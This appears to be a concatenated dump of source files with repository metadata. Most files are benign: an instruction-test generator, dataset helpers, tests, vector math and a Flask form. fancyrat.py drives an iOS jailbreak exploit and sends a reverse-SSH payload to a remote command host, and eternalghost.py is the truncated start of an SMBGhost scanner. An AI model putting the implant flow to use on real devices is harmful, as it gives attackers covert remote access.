if cDefAddrBits > cAddrBits or cAddrBits == 16:
if cDefAddrBits == 64:
assert cAddrBits == 32;
if iBaseReg is not None:
self.write(' mov %s, %#018x\n'
' or %s, %s\n'
% ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
g_asGRegs64[iBaseReg], g_asGRegs64[iTmpReg1],));
if iIndexReg is not None and iIndexReg != iBaseReg:
self.write(' mov %s, %#018x\n'
' or %s, %s\n'
% ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
g_asGRegs64[iIndexReg], g_asGRegs64[iTmpReg1],));
else:
assert cDefAddrBits == 32; assert cAddrBits == 16; assert iIndexReg is None;
if iBaseReg is not None:
self.write(' or %s, %#010x\n'
% ( g_asGRegs32[iBaseReg], randU32() & 0xffff0000, ));
# Epilogue.
self.write(' pop %s\n'
' MY_POP_FLAGS\n'
' ret sCB\n'
'VBINSTST_ENDPROC Common_MemSetup_%s\n'
% ( self.oTarget.asGRegs[iTmpReg1], sName,));
def _generateFileFooter(self):
"""
Generates file footer.
"""
# Terminate the trap records.
self.write('\n\n'
';\n'
'; Terminate the trap records\n'
';\n'
'VBINSTST_BEGINDATA\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
'VBINSTST_TRAP_RECS_END\n'
'%endif\n'
'VBINSTST_BEGINCODE\n');
# Register checking functions.
for sName in self._dCheckFns:
asRegs = sName.split('_');
sPushSize = 'dword';
# Do we check eflags first.
if asRegs[0] == 'eflags':
asRegs.pop(0);
sFlagsToCheck = asRegs.pop(0);
self.write('\n\n'
'; Check flags and then defers to the register-only checker\n'
'; To save space, the callee cleans up the stack.'
'; Ref count: %u\n'
'VBINSTST_BEGINPROC %s%s\n'
' MY_PUSH_FLAGS\n'
' push sAX\n'
' mov sAX, [xSP + sCB]\n'
' and sAX, %s\n'
' cmp sAX, [xSP + xCB + sCB*2]\n'
' je .equal\n'
% ( self._dCheckFns[sName], self.ksCheckerPrefix, sName,
sFlagsToCheck,));
self.write(' push dword 0xef ; register number\n'
' push sAX ; actual\n'
' mov sAX, [xSP + xCB + sCB*4]\n'
' push sAX ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n');
self.write('.equal:\n'
' mov xAX, [xSP + sCB*2]\n' # Remove the expected eflags value from the stack frame.
' mov [xSP + sCB*2 + xCB + sCB - xCB], xAX\n'
' pop sAX\n'
' MY_POP_FLAGS\n'
' lea xSP, [xSP + sCB]\n'
' jmp VBINSTST_NAME(Common_Check_%s)\n'
'VBINSTST_ENDPROC %s%s\n'
% ( '_'.join(asRegs),
self.ksCheckerPrefix, sName,) );
else:
# Prologue
self.write('\n\n'
'; Checks 1 or more register values, expected values pushed on the stack.\n'
'; To save space, the callee cleans up the stack.'
'; Ref count: %u\n'
'VBINSTST_BEGINPROC %s%s\n'
' MY_PUSH_FLAGS\n'
% ( self._dCheckFns[sName], self.ksCheckerPrefix, sName, ) );
# Register checks.
for i in range(len(asRegs)):
sReg = asRegs[i];
iReg = self.oTarget.asGRegs.index(sReg);
if i == asRegs.index(sReg): # Only check once, i.e. input = output reg.
self.write(' cmp %s, [xSP + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
' je .equal%u\n'
' push %s %u ; register number\n'
' push %s ; actual\n'
' mov %s, [xSP + sCB*2 + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
' push %s ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.equal%u:\n'
% ( sReg, i, i, sPushSize, iReg, sReg, sReg, i, sReg, i, ) );
# Restore known register values and check the other registers.
for sReg in asRegs:
if self.oTarget.is64Bit():
self.write(' mov %s, [g_u64KnownValue_%s wrt rip]\n' % (sReg, sReg,));
else:
iReg = self.oTarget.asGRegs.index(sReg)
self.write(' mov %s, 0x%x\n' % (sReg, self.au32Regs[iReg],));
self.write(' MY_POP_FLAGS\n'
' call VBINSTST_NAME(Common_CheckKnownValues)\n'
' ret sCB*%u\n'
'VBINSTST_ENDPROC %s%s\n'
% (len(asRegs), self.ksCheckerPrefix, sName,));
# memory setup functions
self._generateMemSetupFunctions();
# 64-bit constants.
if len(self._d64BitConsts) > 0:
self.write('\n\n'
';\n'
'; 64-bit constants\n'
';\n');
for uVal in self._d64BitConsts:
self.write('g_u64Const_0x%016x: dq 0x%016x ; Ref count: %d\n' % (uVal, uVal, self._d64BitConsts[uVal], ) );
return True;
def _generateTests(self):
"""
Generate the test cases.
"""
for self.iFile in range(self.cFiles):
if self.cFiles == 1:
self.sFile = '%s.asm' % (self.oOptions.sOutputBase,)
else:
self.sFile = '%s-%u.asm' % (self.oOptions.sOutputBase, self.iFile)
self.oFile = sys.stdout;
if self.oOptions.sOutputBase != '-':
self.oFile = io.open(self.sFile, 'w', buffering = 65536, encoding = 'utf-8');
self._generateFileHeader();
# Calc the range.
iInstrTestStart = self.iFile * self.oOptions.cInstrPerFile;
iInstrTestEnd = iInstrTestStart + self.oOptions.cInstrPerFile;
if iInstrTestEnd > len(g_aoInstructionTests):
iInstrTestEnd = len(g_aoInstructionTests);
# Generate the instruction tests.
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
oInstrTest = g_aoInstructionTests[iInstrTest];
if oInstrTest.isApplicable(self):
self.write('\n'
'\n'
';\n'
'; %s\n'
';\n'
% (oInstrTest.sName,));
self._randInitIndexes();
oInstrTest.generateTest(self, self._calcTestFunctionName(oInstrTest, iInstrTest));
# Generate the main function.
self.write('\n\n'
'VBINSTST_BEGINPROC TestInstrMain\n'
' MY_PUSH_ALL\n'
' sub xSP, 40h\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
' VBINSTST_TRAP_RECS_INSTALL\n'
'%endif\n'
'\n');
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
oInstrTest = g_aoInstructionTests[iInstrTest];
if oInstrTest.isApplicable(self):
self.write('%%ifdef ASM_CALL64_GCC\n'
' lea rdi, [.szInstr%03u wrt rip]\n'
'%%elifdef ASM_CALL64_MSC\n'
' lea rcx, [.szInstr%03u wrt rip]\n'
'%%else\n'
' mov xAX, .szInstr%03u\n'
' mov [xSP], xAX\n'
'%%endif\n'
' VBINSTST_CALL_FN_SUB_TEST\n'
' call VBINSTST_NAME(%s)\n'
% ( iInstrTest, iInstrTest, iInstrTest, self._calcTestFunctionName(oInstrTest, iInstrTest)));
self.write('\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
' VBINSTST_TRAP_RECS_UNINSTALL\n'
'%endif\n'
' add xSP, 40h\n'
' MY_POP_ALL\n'
' ret\n\n');
for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
self.write('.szInstr%03u: db \'%s\', 0\n' % (iInstrTest, g_aoInstructionTests[iInstrTest].sName,));
self.write('VBINSTST_ENDPROC TestInstrMain\n\n');
self._generateFileFooter();
if self.oOptions.sOutputBase != '-':
self.oFile.close();
self.oFile = None;
self.sFile = '';
return RTEXITCODE_SUCCESS;
def _runMakefileMode(self):
"""
Generate a list of output files on standard output.
"""
if self.cFiles == 1:
print('%s.asm' % (self.oOptions.sOutputBase,));
else:
print(' '.join('%s-%s.asm' % (self.oOptions.sOutputBase, i) for i in range(self.cFiles)));
return RTEXITCODE_SUCCESS;
def run(self):
"""
Generates the tests or whatever is required.
"""
if self.oOptions.fMakefileMode:
return self._runMakefileMode();
sys.stderr.write('InstructionTestGen.py: Seed = %s\n' % (g_iMyRandSeed,));
return self._generateTests();
@staticmethod
def main():
"""
Main function a la C/C++. Returns exit code.
"""
#
# Parse the command line.
#
oParser = OptionParser(version = __version__[11:-1].strip());
oParser.add_option('--makefile-mode', dest = 'fMakefileMode', action = 'store_true', default = False,
help = 'Special mode for use to output a list of output files for the benefit of '
'the make program (kmk).');
oParser.add_option('--split', dest = 'cInstrPerFile', metavar = '<instr-per-file>', type = 'int', default = 9999999,
help = 'Number of instruction to test per output file.');
oParser.add_option('--output-base', dest = 'sOutputBase', metavar = '<file>', default = None,
help = 'The output file base name, no suffix please. Required.');
oParser.add_option('--target', dest = 'sTargetEnv', metavar = '<target>',
default = 'iprt-r3-32',
choices = g_dTargetEnvs.keys(),
help = 'The target environment. Choices: %s'
% (', '.join(sorted(g_dTargetEnvs.keys())),));
oParser.add_option('--test-size', dest = 'sTestSize', default = InstructionTestGen.ksTestSize_Medium,
choices = InstructionTestGen.kasTestSizes,
help = 'Selects the test size.');
(oOptions, asArgs) = oParser.parse_args();
if len(asArgs) > 0:
oParser.print_help();
return RTEXITCODE_SYNTAX
if oOptions.sOutputBase is None:
print('syntax error: Missing required option --output-base.', file = sys.stderr);
return RTEXITCODE_SYNTAX
#
# Instantiate the program class and run it.
#
oProgram = InstructionTestGen(oOptions);
return oProgram.run();
if __name__ == '__main__':
sys.exit(InstructionTestGen.main());
| 43.23125
| 130
| 0.517132
| 87,528
| 0.90386
| 0
| 0
| 2,886
| 0.029802
| 0
| 0
| 25,666
| 0.265041
|
3698ef5864ca5ca9b604faa7dd2e31ba6fa54aa7
| 6,169
|
py
|
Python
|
bann/b_data_functions/pytorch/shared_memory_interface.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_data_functions/pytorch/shared_memory_interface.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_data_functions/pytorch/shared_memory_interface.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""".. moduleauthor:: Artur Lissin"""
import abc
from copy import copy
from dataclasses import dataclass
from multiprocessing.managers import SharedMemoryManager
from multiprocessing.shared_memory import SharedMemory
from typing import Tuple, List, Optional, final, TypeVar, Generic
from torch.utils.data import Dataset
import numpy as np # type: ignore
from bann.b_data_functions.errors.custom_erors import KnownErrorBannData
@final
@dataclass
class TypeShapeCon:
type: np.dtype = np.dtype('float')
shape: Tuple[int, ...] = (4,)
data: Optional[np.ndarray] = None
shared_data: Optional[SharedMemory] = None
@final
class SmmConManger:
def __init__(self) -> None:
self.__smm: SharedMemoryManager = SharedMemoryManager()
self.__started: bool = False
self.__stopped: bool = False
@property
def smm(self) -> SharedMemoryManager:
return self.__smm
def smm_shutdown(self) -> None:
if self.__started and not self.__stopped:
self.__smm.shutdown()
self.__stopped = True
def smm_start(self) -> None:
if not (self.__started or self.__stopped):
self.__smm.start()
self.__started = True
_TypD = TypeVar('_TypD')
class DataSetSharedMemoryA(abc.ABC, Dataset, Generic[_TypD]):
def __init__(self, data_len: int, /) -> None:
super().__init__()
self.__subset: List[int] = []
self.__subsets_locked: bool = False
self.__smm: Optional[SharedMemoryManager] = None
self.__data_len = data_len
@final
def __len__(self) -> int:
return self.__data_len
@final
@property
def subset(self) -> List[int]:
return self.__subset
@final
def _set_subset(self, indices: List[int], /) -> None:
self.__subset = indices
if indices:
self.__data_len = len(indices)
@final
def _lock_subsets(self) -> None:
self.__subsets_locked = True
@final
def create_subsets(self, indices: List[int], /) -> 'DataSetSharedMemoryA':
if self.__subsets_locked:
raise KnownErrorBannData("subset of subset is prohibited")
shallow_copy = copy(self)
shallow_copy._set_subset(indices)
shallow_copy._lock_subsets()
shallow_copy._trim_shallow_copy(indices)
return shallow_copy
@abc.abstractmethod
def _getitem(self, item: int, /) -> _TypD:
raise NotImplementedError("Abstract method!")
@final
def __getitem__(self, item: int) -> _TypD:
self.remap_shared_memory()
return self._getitem(item)
@final
@property
def used_smm(self) -> Optional[SharedMemoryManager]:
return self.__smm
@abc.abstractmethod
def _trim_shallow_copy(self, indices: List[int], /) -> None:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def remap_shared_memory(self) -> None:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def _pre_send_empty(self) -> None:
raise NotImplementedError("Abstract method!")
@final
def pre_send_empty(self) -> None:
self.__smm = None
self._pre_send_empty()
@abc.abstractmethod
def _move_data_to_shared_memory(self) -> None:
raise NotImplementedError("Abstract method!")
@final
def move_data_to_shared_memory(self, smm: SharedMemoryManager, /) -> None:
if self.__smm is not None:
raise KnownErrorBannData("SharedMemoryManager already set")
self.__smm = smm
self._move_data_to_shared_memory()
def _generate_shared_mem_it(np_array: np.ndarray, cont: TypeShapeCon,
smm: SharedMemoryManager, /) -> SharedMemory:
cont.shape = np_array.shape
cont.type = np_array.dtype
shm = smm.SharedMemory(size=np_array.nbytes)
np_buffered = np.ndarray(np_array.shape, dtype=np_array.dtype, buffer=shm.buf)
np_buffered[:] = np_array[:]
return shm
def remap_shared_mem(data: TypeShapeCon, indices: List[int], /) -> None:
# TODO (remove copy) at this point DataLoader doesn't work without copy
if not (data.shared_data is None or data.shape is None or data.type is None):
data_point = data.shared_data
np_buffered_data = np.ndarray(data.shape, dtype=data.type, buffer=data_point.buf)
if indices:
data.data = np.array(list(np_buffered_data[index_i] for index_i in indices))
else:
data.data = copy(np_buffered_data)
data.shared_data = None
def generate_shared_mem(data_type_shape: TypeShapeCon, smm: SharedMemoryManager, /) -> None:
data_l = data_type_shape.data
if data_type_shape.shared_data is None and data_l is None:
raise KnownErrorBannData("Both data types are empty!")
if data_l is not None:
data_type_shape.shared_data = _generate_shared_mem_it(data_l, data_type_shape, smm)
data_type_shape.data = None
def trim_shallow_copy(data_type_shape: TypeShapeCon, indices: List[int], /) -> TypeShapeCon:
if data_type_shape.shared_data is None and data_type_shape.data is None:
raise KnownErrorBannData("Both data types are empty!")
new_con = TypeShapeCon(type=data_type_shape.type, shape=data_type_shape.shape)
if indices:
new_data = data_type_shape.data
if new_data is not None:
new_con.data = np.array(list(new_data[data_index] for data_index in indices))
new_con.shared_data = data_type_shape.shared_data
return new_con
new_con.shared_data = data_type_shape.shared_data
new_con.data = data_type_shape.data
return new_con
def data_get_item(data: TypeShapeCon, index: int, /) -> np.ndarray:
if data.data is not None:
return np.array(data.data[index])
raise KnownErrorBannData("Should never happen")
def data_shallow_copy_shared_mem(data: TypeShapeCon, /) -> TypeShapeCon:
if data.shared_data is None:
raise KnownErrorBannData("Shared data is empty!")
new_con = TypeShapeCon(type=data.type, shape=data.shape)
new_con.shared_data = data.shared_data
return new_con
| 32.468421
| 92
| 0.681796
| 3,118
| 0.50543
| 0
| 0
| 2,746
| 0.445129
| 0
| 0
| 435
| 0.070514
|
36990bef47fde53e2358b6c735c82b0360a40313
| 1,090
|
py
|
Python
|
packages/python/yap_kernel/yap_kernel/tests/test_io.py
|
ryandesign/yap
|
9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214
|
[
"Artistic-1.0-Perl",
"ClArtistic"
] | 90
|
2015-03-09T01:24:15.000Z
|
2022-02-24T13:56:25.000Z
|
packages/python/yap_kernel/yap_kernel/tests/test_io.py
|
ryandesign/yap
|
9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214
|
[
"Artistic-1.0-Perl",
"ClArtistic"
] | 52
|
2016-02-14T08:59:37.000Z
|
2022-03-14T16:39:35.000Z
|
packages/python/yap_kernel/yap_kernel/tests/test_io.py
|
ryandesign/yap
|
9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214
|
[
"Artistic-1.0-Perl",
"ClArtistic"
] | 27
|
2015-11-19T02:45:49.000Z
|
2021-11-25T19:47:58.000Z
|
"""Test IO capturing functionality"""
import io
import zmq
from jupyter_client.session import Session
from yap_kernel.iostream import IOPubThread, OutStream
import nose.tools as nt
def test_io_api():
"""Test that wrapped stdout has the same API as a normal TextIO object"""
session = Session()
ctx = zmq.Context()
pub = ctx.socket(zmq.PUB)
thread = IOPubThread(pub)
thread.start()
stream = OutStream(session, thread, 'stdout')
# cleanup unused zmq objects before we start testing
thread.stop()
thread.close()
ctx.term()
assert stream.errors is None
assert not stream.isatty()
with nt.assert_raises(io.UnsupportedOperation):
stream.detach()
with nt.assert_raises(io.UnsupportedOperation):
next(stream)
with nt.assert_raises(io.UnsupportedOperation):
stream.read()
with nt.assert_raises(io.UnsupportedOperation):
stream.readline()
with nt.assert_raises(io.UnsupportedOperation):
stream.seek()
with nt.assert_raises(io.UnsupportedOperation):
stream.tell()
| 25.952381
| 77
| 0.694495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 170
| 0.155963
|
369bd233d08fbdcd2a214a81e7c5f52a9ce6ed4e
| 551
|
py
|
Python
|
OSIx/modules/temp_file_manager.py
|
guibacellar/OSIx
|
058714c1870bde0d794452b32ad0e62d544bdd90
|
[
"Apache-2.0"
] | 1
|
2021-08-17T18:45:07.000Z
|
2021-08-17T18:45:07.000Z
|
OSIx/modules/temp_file_manager.py
|
guibacellar/OSIx
|
058714c1870bde0d794452b32ad0e62d544bdd90
|
[
"Apache-2.0"
] | 12
|
2021-08-11T18:24:32.000Z
|
2021-08-23T14:57:36.000Z
|
OSIx/modules/temp_file_manager.py
|
guibacellar/OSIx
|
058714c1870bde0d794452b32ad0e62d544bdd90
|
[
"Apache-2.0"
] | null | null | null |
"""Temporary Files Manager."""
import logging
from configparser import ConfigParser
from typing import Dict
from OSIx.core.base_module import BaseModule
from OSIx.core.temp_file import TempFileHandler
logger = logging.getLogger()
class TempFileManager(BaseModule):
"""Temporary File Manager."""
def run(self, config: ConfigParser, args: Dict, data: Dict) -> None:
"""Execute Module."""
if args['purge_temp_files']:
TempFileHandler.purge()
else:
TempFileHandler.remove_expired_entries()
| 22.04
| 72
| 0.69873
| 314
| 0.569873
| 0
| 0
| 0
| 0
| 0
| 0
| 98
| 0.177858
|
369d292bf15ec11e1c3a4ad6d68821a207a8fc33
| 1,124
|
py
|
Python
|
vectors/vectormath.py
|
sbanwart/data-science
|
07f568e5f55a43339a9dca3ba3a13b263f54a37c
|
[
"MIT"
] | null | null | null |
vectors/vectormath.py
|
sbanwart/data-science
|
07f568e5f55a43339a9dca3ba3a13b263f54a37c
|
[
"MIT"
] | null | null | null |
vectors/vectormath.py
|
sbanwart/data-science
|
07f568e5f55a43339a9dca3ba3a13b263f54a37c
|
[
"MIT"
] | null | null | null |
import math
def vector_add(v, w):
"""adds corresponding elements"""
return [v_i + w_i
for v_i, w_i in zip(v, w)]
def vector_subtract(v, w):
"""subtracts corresponding elements"""
return [v_i - w_i
for v_i, w_i in zip(v, w)]
def vector_sum(vectors):
return reduce(vector_add, vectors)
def scalar_multiply(c, v):
"""c is a number, v is a vector"""
return [c * v_i for v_i in v]
def vector_means(vectors):
"""compute the vector whose ith element is the mean of the
ith elements of the input vectors"""
n = len(vectors)
return scalar_multiply(1 / n, vector_sum(vectors))
def dot(v, w):
"""v_1 * w_1 + ... + v_n * w_n"""
return sum(v_i * w_i
for v_i, w_i in zip(v, w))
def sum_of_squares(v):
"""v_1 * v_1 + ... + v_n * v_n"""
return dot(v, v)
def magnitude(v):
return math.sqrt(sum_of_squares(v)) # math.sqrt is the square root function
def squared_distance(v, w):
"""(v_1 - w_1) ** 2 + ... + (v_n - w_n) ** 2"""
return sum_of_squares(vector_subtract(v, w))
def distance(v, w):
return magnitude(vector_subtract(v, w))
| 25.545455
| 79
| 0.615658
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 357
| 0.317616
|
369da642edb63cf01850b1f337a064efb7bb43b6
| 2,800
|
py
|
Python
|
fancyrat.py
|
avacadoPWN/fancyrat
|
477d5cb11a9af4f741770e4790f64884af1d01c3
|
[
"MIT"
] | 1
|
2022-02-20T03:52:03.000Z
|
2022-02-20T03:52:03.000Z
|
fancyrat.py
|
avacadoPWN/fancyrat
|
477d5cb11a9af4f741770e4790f64884af1d01c3
|
[
"MIT"
] | null | null | null |
fancyrat.py
|
avacadoPWN/fancyrat
|
477d5cb11a9af4f741770e4790f64884af1d01c3
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import exploit
import ui_setup
from time import sleep
checkrain = exploit.Checkrain()
checkrain.REMOTE_SSH_CC = 'kali@fancyrat.moo.com'
window = ui_setup.UI.window
keep_printing=True
while True:
if window['-OUTPUT-'].DisplayText.count('\n') >= 14:
window['-OUTPUT-'].DisplayText = window['-OUTPUT-'].DisplayText.split(
'\n', maxsplit=1)[1]
event, values = window.read(timeout=500)
#print(event)
if event == ui_setup.sg.WINDOW_CLOSED or event == 'Quit':
checkrain.kill()
checkrain.kill_inject()
break
if event == 'PWN' and checkrain.pid() is None and checkrain.isdone() is False:
checkrain.pwn()
#print(checkrain.pid())
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
"[*] Exploiting IOS device!\n", text_color='#0ab3d1')
if event == 'Inject' and checkrain.pid() != None and checkrain.inject_pid() is None and checkrain.isdone() is False:
try:
checkrain.inject()
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
"[***] Openning shell over USB to IOS device.\n")
try:
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
"[*] Sending Reverse SSH payload.....\n",)
if checkrain.reverse_ssh() != True:
raise ValueError("payload_not_sent")
else:
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
"[***] Payload sent!!!\n")
except ValueError:
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
"[!] Failed to send payload!\n")
checkrain.kill_inject()
except:
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
"[!] Unable to open shell over USB on IOS device!\n")
checkrain.kill_inject()
pass
if event == 'Reset':
checkrain.kill()
checkrain.kill_inject()
window['-OUTPUT-'].update('', background_color='#2b2b2b')
if keep_printing is True:
if checkrain.isdone() is True:
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
"\n ($$$$=====WIN====$$$$)\n\n", text_color='#28d1b5')
window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
" ͡° ͜ʖ ͡°\n\n", text_color='#28d1b5')
keep_printing = False
else:
window['-OUTPUT-'].update(window['-OUTPUT-'].get() + checkrain.log.readline())
else:
pass
window.close()
| 35.897436
| 120
| 0.496786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 681
| 0.242694
|
369df66a1e15a4a67f881d9565ed02382eda4bee
| 1,237
|
py
|
Python
|
sysinv/sysinv/sysinv/sysinv/tests/helm/test_base.py
|
albailey/config
|
40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9
|
[
"Apache-2.0"
] | 10
|
2020-02-07T18:57:44.000Z
|
2021-09-11T10:29:34.000Z
|
sysinv/sysinv/sysinv/sysinv/tests/helm/test_base.py
|
albailey/config
|
40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:01:55.000Z
|
2021-01-14T12:01:55.000Z
|
sysinv/sysinv/sysinv/sysinv/tests/helm/test_base.py
|
albailey/config
|
40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9
|
[
"Apache-2.0"
] | 10
|
2020-10-13T08:37:46.000Z
|
2022-02-09T00:21:25.000Z
|
# Copyright (c) 2021 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import mock
from sysinv.helm.base import BaseHelm
from sysinv.helm.helm import HelmOperator
from sysinv.tests import base as test_base
class TestHelmBase(test_base.TestCase):
def test_num_replicas_for_platform_app_0_controllers(self):
self.check_num_replicas_for_platform_app(num_provisioned_controllers=0, expected_replicas=1)
def test_num_replicas_for_platform_app_1_controllers(self):
self.check_num_replicas_for_platform_app(num_provisioned_controllers=1, expected_replicas=1)
def test_num_replicas_for_platform_app_2_controllers(self):
self.check_num_replicas_for_platform_app(num_provisioned_controllers=2, expected_replicas=2)
def check_num_replicas_for_platform_app(self, num_provisioned_controllers, expected_replicas):
mock_operator = mock.MagicMock(spec=HelmOperator)
mock_operator.dbapi = mock.MagicMock()
mock_operator.dbapi.count_hosts_matching_criteria.return_value = num_provisioned_controllers
base = BaseHelm(mock_operator)
actual_replicas = base._num_replicas_for_platform_app()
self.assertEqual(actual_replicas, expected_replicas)
| 37.484848
| 100
| 0.805174
| 1,008
| 0.814875
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.067906
|
369eb5cfd592210dd63a2cf4b6ab2112394dc2c9
| 612
|
py
|
Python
|
tests/test_as_decimal.py
|
lkattis-signal/SignalSDK
|
f085b9cae0495f4e016b9982df271efc6fd0a8f5
|
[
"Apache-2.0"
] | 10
|
2020-09-29T06:36:45.000Z
|
2022-03-14T18:15:50.000Z
|
tests/test_as_decimal.py
|
lkattis-signal/SignalSDK
|
f085b9cae0495f4e016b9982df271efc6fd0a8f5
|
[
"Apache-2.0"
] | 53
|
2020-10-08T10:05:00.000Z
|
2022-03-29T14:21:18.000Z
|
tests/test_as_decimal.py
|
lkattis-signal/SignalSDK
|
f085b9cae0495f4e016b9982df271efc6fd0a8f5
|
[
"Apache-2.0"
] | 5
|
2020-09-25T07:48:04.000Z
|
2021-11-23T07:08:56.000Z
|
from decimal import Decimal
from signal_ocean._internals import as_decimal
def test_handles_None():
assert as_decimal(None) is None
def test_handles_empty_strings():
assert as_decimal("") is None
def test_parses_strings():
assert as_decimal("12.345") == Decimal("12.345")
def test_handles_0():
assert as_decimal(0.0) == Decimal("0.0")
def test_converts_floats_to_decimals_exactly():
dec = as_decimal(24.390015)
# due to float imprecision, will be 24.39001599999...
assert dec != Decimal(24.390015)
# will be precisely 24.390015
assert dec == Decimal("24.390015")
| 20.4
| 57
| 0.714052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 116
| 0.189542
|
369efff06f7a72f84b0e9a781b19f53a96b5ca56
| 1,610
|
py
|
Python
|
Francisco_Trujillo/Assignments/registration/serverre.py
|
webguru001/Python-Django-Web
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
[
"MIT"
] | 5
|
2019-05-17T01:30:02.000Z
|
2021-06-17T21:02:58.000Z
|
Francisco_Trujillo/Assignments/registration/serverre.py
|
curest0x1021/Python-Django-Web
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
[
"MIT"
] | null | null | null |
Francisco_Trujillo/Assignments/registration/serverre.py
|
curest0x1021/Python-Django-Web
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, request, redirect, session, flash
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
app.secret_key = 'irtndvieurnviur'
@app.route('/')
def index():
return render_template("index.html")
#check all for empty and password >=8
def checkForValuelength(form):
if ((len(form['email']))< 1 or
(len(form['fname']))< 1 or
(len(form['lname']))< 1 or
(len(form['password']))<=8 or
(len(form['cpassword']))<= 8):
return False
return True
# check for valid name and last name
def validNamefileds(form):
if not form['fname'].isalpha() or not form['lname'].isalpha():
return False
return True
# invalid EMAIL
def matchPassword(form):
if not form['password'] == form['cpassword']:
return False
return True
@app.route('/process', methods=['POST'])
def form_page():
if not checkForValuelength(request.form):
flash("All fileds are required and password must be 8 or more characater")
return redirect('/')
elif not validNamefileds(request.form):
flash("Name and last name must not contain numbers")
return redirect('/')
elif not EMAIL_REGEX.match(request.form['email']):
flash("Invalid Email address")
return redirect('/')
elif not matchPassword(request.form):
flash("Password do not match")
return redirect ('/')
flash("Form sccessfully submitted")
return redirect('/')
@app.route('/')
def result_page():
return redirect('/')
app.run(debug=True)
| 28.245614
| 82
| 0.636646
| 0
| 0
| 0
| 0
| 779
| 0.483851
| 0
| 0
| 475
| 0.295031
|
369f3934be836b3619a596d326601ac157eae3f4
| 2,344
|
py
|
Python
|
eternalghost.py
|
awareseven/eternalghosttest
|
989dafac06b72af21e1cd7103c92ec6b399e5133
|
[
"MIT"
] | 2
|
2020-03-15T11:39:18.000Z
|
2021-12-05T20:38:48.000Z
|
eternalghost.py
|
awareseven/eternalghosttest
|
989dafac06b72af21e1cd7103c92ec6b399e5133
|
[
"MIT"
] | null | null | null |
eternalghost.py
|
awareseven/eternalghosttest
|
989dafac06b72af21e1cd7103c92ec6b399e5133
|
[
"MIT"
] | 2
|
2020-03-18T20:21:37.000Z
|
2020-10-13T09:19:14.000Z
|
import socket
import struct
import sys
banner = """
_ _ _ _
| | | | | | | |
___| |_ ___ _ __ _ __ __ _| | __ _| |__ ___ ___| |_
/ _ \ __/ _ \ '__| '_ \ / _` | |/ _` | '_ \ / _ \/ __| __|
| __/ || __/ | | | | | (_| | | (_| | | | | (_) \__ \ |_
\___|\__\___|_| |_| |_|\__,_|_|\__, |_| |_|\___/|___/\__|
__/ |
|___/
\t\t\t\t\tby AWARE7 GmbH
"""
print(banner)
if len(sys.argv) < 2:
print("Not enough Arguments")
print("python3 scanner.py <IP-Address>")
sys.exit()
# Connection-Handle for SMB Handshake
